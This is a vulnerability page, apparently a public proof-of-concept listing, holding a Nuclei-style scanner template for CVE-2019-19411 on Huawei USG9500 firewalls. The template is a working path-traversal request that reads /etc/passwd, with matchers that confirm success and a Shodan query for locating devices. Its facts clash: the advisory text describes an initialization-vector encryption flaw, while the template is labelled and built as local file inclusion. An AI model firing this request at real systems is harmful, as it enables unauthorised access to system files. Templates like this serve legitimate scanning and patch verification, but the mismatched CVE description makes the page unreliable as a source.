USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
PoC代码[已公开]
id: CVE-2019-19411
info:
name: Huawei Firewall - Local File Inclusion
author: taielab
severity: low
description: |
USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
reference:
- https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 3.7
cve-id: CVE-2019-19411
cwe-id: CWE-665
epss-score: 0.02952
epss-percentile: 0.85965
cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: huawei
product: usg9500
shodan-query: title:"HUAWEI"
tags: cve,cve2019,huawei,firewall,lfi
http:
- method: GET
path:
- "{{BaseURL}}/umweb/../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:[x*]:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200
# digest: 4a0a0047304502210090d871214dec3332d439f01ea4954b2bbfd9e70e5272fbff8153ddce17d23a110220161b1be3d09c9bd5bd3083031b1f12384adee644cdbd5909492e7e7167558303:922c64590222798bb761d5b6d8e72950